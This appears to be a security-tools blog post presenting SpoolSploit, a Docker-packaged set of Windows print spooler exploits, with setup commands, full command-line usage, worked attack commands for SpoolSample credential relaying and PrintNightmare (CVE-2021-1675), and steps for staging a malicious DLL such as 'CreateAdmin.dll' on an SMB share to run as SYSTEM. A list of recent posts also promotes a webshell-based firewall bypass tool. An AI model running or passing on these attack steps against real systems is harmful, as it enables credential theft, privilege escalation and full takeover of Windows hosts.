Kali Linux

SpoolSploit : A Collection Of Windows Print Spooler Exploits

SpoolSploit is a collection of Windows print spooler exploits containerized with other utilities for practical exploitation. A couple of highly effective methods would be relaying machine account credentials to escalate privileges and execute malicious DLLs on endpoints with full system access.

Getting Started

As of the release date the SpoolSploit Docker container has been tested successfully on the latest versions of MacOSUbuntu Linux, and Windows 10.

Although not required, if you would like to host malicious DLLs or conduct credential relay attacks, all within the SpoolSploit container, you should ensure port 445 is not in use on the host running Docker. This is most prevalent when running this container on a Windows host, as it uses port 445 by default. If disabling port 445 on your host is not practical, that is okay! You can simply run the docker container in a virtual machine that has the network adapter configured in bridge mode. This will allow for serving malicious DLLs and relay credentials. If you only want to serve malicious DLLs, you could simply host the DLLs on an anonymous access share on your host OS or a compromised server share.

Create and access the SpoolSploit Docker container

  • Clone this repository

git clone https://github.com/BeetleChunks/SpoolSploit

  • Build the SpoolSploit Docker container image

cd SpoolSploit
sudo docker build -t spoolsploit .

  • Create and start the SpoolSploit Docker container

sudo docker run -dit -p 445:445 –name spoolsploit spoolsploit:latest

  • Attach to the container

sudo docker exec -it spoolsploit /bin/bash

Command-line Usage

usage: spool_sploit.py [-h] -a {spoolsample,nightmare} -rH RHOST -rP {139,445} [-lH LHOST] [-lS LSHARE] -d DOMAIN -u USER -p PASSWD
optional arguments:
-h, –help show this help message and exit
-a {spoolsample,nightmare}, –attack {spoolsample,nightmare}
Attack type to execute on target(s).
-rH RHOST, –rhost RHOST
Remote target IP, CIDR range, or filename (file:)
-rP {139,445}, –rport {139,445}
Remote SMB server port.
-lH LHOST, –lhost LHOST
Listening hostname or IP
-lS LSHARE, –lshare LSHARE
Staging SMB share (UNC)
-d DOMAIN, –domain DOMAIN
Domain for authentication
-u USER, –username USER
Username for authentication
-p PASSWD, –password PASSWD
Password for authentication
Example – spoolsample:
python3 spool_sploit.py -a spoolsample -lH 10.14.1.24 -d evil.corp -u rjmcdow -p ‘P4ssword123!’ -rP 445 -rH 10.5.1.10
Example – nightmare:
python3 spool_sploit.py -a nightmare -lS ‘\10.14.1.24\C$\CreateAdmin.dll’ -d evil.corp -u rjmcdow -p ‘P4ssword123!’ -rP 445 -rH 10.5.1.10

SpoolSample – Capture and relay Windows machine account credentials

The SpoolSploit Docker container includes Responder for relaying machine account hashes obtained from executing the spoolsample attack in SpoolSploit. As several great articles exist detailing the process of relaying privileged machine account credentials for privilege escalation, I will not go into those details here.

PrintNightmare (CVE-2021-1675) – Execute malicious DLLs on Windows targets as SYSTEM

Included in the SpoolSploit container is an SMB server implemented via Impacket. This server can be used to host malicious DLLs when executing the printnightmare attack in SpoolSploit. The default SMB server settings work, but if you want to customize them you can modify the configuration file located at /home/dlogmas/smbserver/smb-v1.conf.

The only thing you need to do is copy your DLL to the SMB server’s share folder in the SpoolSploit container. The share path in the container is /home/dlogmas/smbserver/share/. The following commands demonstrate how to upload a DLL to the SpoolSploit container and make it accessible to the SMB server.

sudo docker cp ./malicious.dll spoolsploit:/home/dlogmas/smbserver/share/
sudo docker exec spoolsploit /bin/sh -c ‘sudo chown dlogmas:dlogmas /home/dlogmas/smbserver/share/malicious.dll’

R K

Recent Posts

Pystinger : Bypass Firewall For Traffic Forwarding Using Webshell

Pystinger is a Python-based tool that enables SOCKS4 proxying and port mapping through webshells. It…

2 days ago

CVE-Search : A Tool To Perform Local Searches For Known Vulnerabilities

Introduction When it comes to cybersecurity, speed and privacy are critical. Public vulnerability databases like…

2 days ago

CVE-Search : A Tool To Perform Local Searches For Known Vulnerabilities

Introduction When it comes to cybersecurity, speed and privacy are critical. Public vulnerability databases like…

3 days ago

How to Bash Append to File: A Simple Guide for Beginners

If you are working with Linux or writing bash scripts, one of the most common…

3 days ago

Mastering the Bash Case Statement with Simple Examples

What is a bash case statement? A bash case statement is a way to control…

3 days ago

How to Check if a File Exists in Bash – Simply Explained

Why Do We Check Files in Bash? When writing a Bash script, you often work…

5 days ago